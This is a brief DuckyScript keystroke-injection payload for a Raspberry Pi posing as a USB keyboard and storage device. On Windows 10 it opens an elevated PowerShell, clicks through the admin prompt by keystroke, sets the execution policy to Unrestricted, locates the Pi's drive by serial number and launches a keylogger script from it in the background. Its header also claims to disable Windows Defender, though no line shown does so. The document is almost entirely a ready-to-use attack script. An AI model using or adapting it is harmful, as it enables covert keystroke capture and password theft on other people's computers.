REM Author : Gwendoline Dossegger
REM Launch the keylogger on Windows 10 
REM Desactivate Windows Defender and run the keylogger store in the Pi's mass storage
GUI R
DEFAULTDELAY 100
DELAY 1000
STRING powershell Start-Process powershell -verb runas
ENTER
DELAY 1000
ARROW_L
ENTER
STRING Set-ExecutionPolicy Unrestricted -Froce
ENTER
STRING $letter =Get-Disk | Where-Object -FilterScript {$_.SerialNumber -Eq "fedcba9876543210"} | Get-Partition | Select-Object DriveLetter
ENTER
STRING $l = "{0}:\" -f $letter.DriveLetter
ENTER
STRING Start-Job -FilePath F:\keylogger.ps1 -ArgumentList $l 
ENTER
DELAY 1000
STRING exit
ENTER
